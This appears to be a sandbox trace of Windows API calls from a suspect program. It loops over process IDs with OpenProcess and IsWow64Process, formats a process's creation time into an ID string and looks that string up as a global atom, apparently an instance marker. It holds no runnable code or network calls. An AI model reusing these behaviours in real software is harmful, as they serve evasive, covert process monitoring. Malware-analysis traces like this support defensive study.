	[0093.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0093.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0093.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0093.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0093.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0093.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0093.452] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.452] CloseHandle (hObject=0x20c) returned 1
	[0093.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0093.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0093.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0093.453] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.453] CloseHandle (hObject=0x20c) returned 1
	[0093.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0093.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0093.453] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.453] CloseHandle (hObject=0x20c) returned 1
	[0093.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0093.453] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.453] CloseHandle (hObject=0x20c) returned 1
	[0093.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0093.453] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.453] CloseHandle (hObject=0x20c) returned 1
	[0093.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0093.454] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.454] CloseHandle (hObject=0x20c) returned 1
	[0093.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0093.454] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.454] CloseHandle (hObject=0x20c) returned 1
	[0093.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0093.454] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.454] CloseHandle (hObject=0x20c) returned 1
	[0093.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0093.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0093.454] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.454] CloseHandle (hObject=0x20c) returned 1
	[0093.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0093.454] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.454] CloseHandle (hObject=0x20c) returned 1
	[0093.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0093.455] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.455] CloseHandle (hObject=0x20c) returned 1
	[0093.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0093.455] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.455] CloseHandle (hObject=0x20c) returned 1
	[0093.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0093.455] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.455] CloseHandle (hObject=0x20c) returned 1
	[0093.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0093.455] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.455] CloseHandle (hObject=0x20c) returned 1
	[0093.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0093.455] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.455] CloseHandle (hObject=0x20c) returned 1
	[0093.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0093.456] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.456] CloseHandle (hObject=0x20c) returned 1
	[0093.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0093.456] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.456] CloseHandle (hObject=0x20c) returned 1
	[0093.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0093.456] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.456] CloseHandle (hObject=0x20c) returned 1
	[0093.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0093.456] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.456] CloseHandle (hObject=0x20c) returned 1
	[0093.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0093.456] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.456] CloseHandle (hObject=0x20c) returned 1
	[0093.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0093.456] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.457] CloseHandle (hObject=0x20c) returned 1
	[0093.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0093.457] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.457] CloseHandle (hObject=0x20c) returned 1
	[0093.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0093.457] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.458] CloseHandle (hObject=0x20c) returned 1
	[0093.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0093.458] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.458] CloseHandle (hObject=0x20c) returned 1
	[0093.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0093.458] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.458] CloseHandle (hObject=0x20c) returned 1
	[0093.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0093.458] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.458] CloseHandle (hObject=0x20c) returned 1
	[0093.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0093.458] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.458] CloseHandle (hObject=0x20c) returned 1
	[0093.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0093.458] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.458] CloseHandle (hObject=0x20c) returned 1
	[0093.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0093.459] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.459] CloseHandle (hObject=0x20c) returned 1
	[0093.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0093.459] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.459] CloseHandle (hObject=0x20c) returned 1
	[0093.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0093.459] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.459] CloseHandle (hObject=0x20c) returned 1
	[0093.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0093.459] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.460] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0093.460] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0093.460] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0093.460] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.460] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0093.460] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.460] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0093.460] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0093.460] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0093.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0093.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0093.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0093.461] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.461] CloseHandle (hObject=0x20c) returned 1
	[0093.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0093.461] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.461] CloseHandle (hObject=0x20c) returned 1
	[0093.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0093.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0093.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0093.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0093.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0093.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0093.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0093.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0093.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0093.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0093.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0093.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0093.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0093.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0093.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0093.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0093.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0093.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0093.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0093.587] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.587] CloseHandle (hObject=0x248) returned 1
	[0093.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0093.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0093.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0093.588] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.588] CloseHandle (hObject=0x248) returned 1
	[0093.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0093.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0093.588] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.588] CloseHandle (hObject=0x248) returned 1
	[0093.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0093.588] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.588] CloseHandle (hObject=0x248) returned 1
	[0093.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0093.588] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.589] CloseHandle (hObject=0x248) returned 1
	[0093.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0093.589] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.589] CloseHandle (hObject=0x248) returned 1
	[0093.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0093.589] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.589] CloseHandle (hObject=0x248) returned 1
	[0093.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0093.589] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.589] CloseHandle (hObject=0x248) returned 1
	[0093.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0093.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0093.589] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.589] CloseHandle (hObject=0x248) returned 1
	[0093.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0093.590] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.590] CloseHandle (hObject=0x248) returned 1
	[0093.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0093.590] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.590] CloseHandle (hObject=0x248) returned 1
	[0093.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0093.590] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.590] CloseHandle (hObject=0x248) returned 1
	[0093.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0093.590] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.590] CloseHandle (hObject=0x248) returned 1
	[0093.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0093.590] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.590] CloseHandle (hObject=0x248) returned 1
	[0093.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0093.590] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.590] CloseHandle (hObject=0x248) returned 1
	[0093.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0093.591] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.591] CloseHandle (hObject=0x248) returned 1
	[0093.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0093.591] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.591] CloseHandle (hObject=0x248) returned 1
	[0093.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0093.591] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.591] CloseHandle (hObject=0x248) returned 1
	[0093.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0093.591] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.591] CloseHandle (hObject=0x248) returned 1
	[0093.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0093.591] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.591] CloseHandle (hObject=0x248) returned 1
	[0093.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0093.592] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.592] CloseHandle (hObject=0x248) returned 1
	[0093.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0093.592] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.592] CloseHandle (hObject=0x248) returned 1
	[0093.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0093.592] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.592] CloseHandle (hObject=0x248) returned 1
	[0093.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0093.592] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.592] CloseHandle (hObject=0x248) returned 1
	[0093.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0093.592] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.592] CloseHandle (hObject=0x248) returned 1
	[0093.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0093.592] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.593] CloseHandle (hObject=0x248) returned 1
	[0093.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0093.593] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.593] CloseHandle (hObject=0x248) returned 1
	[0093.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0093.593] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.593] CloseHandle (hObject=0x248) returned 1
	[0093.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0093.593] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.593] CloseHandle (hObject=0x248) returned 1
	[0093.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0093.593] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.593] CloseHandle (hObject=0x248) returned 1
	[0093.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0093.593] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.593] CloseHandle (hObject=0x248) returned 1
	[0093.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0093.594] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.594] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0093.594] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0093.594] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0093.595] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.595] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0093.595] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.596] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0093.596] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0093.596] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0093.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0093.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0093.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0093.596] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.596] CloseHandle (hObject=0x248) returned 1
	[0093.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0093.596] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.596] CloseHandle (hObject=0x248) returned 1
	[0093.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0093.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0093.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0093.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0093.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0093.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0093.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0093.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0093.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0093.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0093.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0093.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0093.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0093.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0093.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0093.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0093.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0093.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0093.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0093.672] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.672] CloseHandle (hObject=0x248) returned 1
	[0093.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0093.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0093.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0093.672] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.672] CloseHandle (hObject=0x248) returned 1
	[0093.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0093.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0093.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.673] CloseHandle (hObject=0x248) returned 1
	[0093.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0093.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.673] CloseHandle (hObject=0x248) returned 1
	[0093.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0093.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.673] CloseHandle (hObject=0x248) returned 1
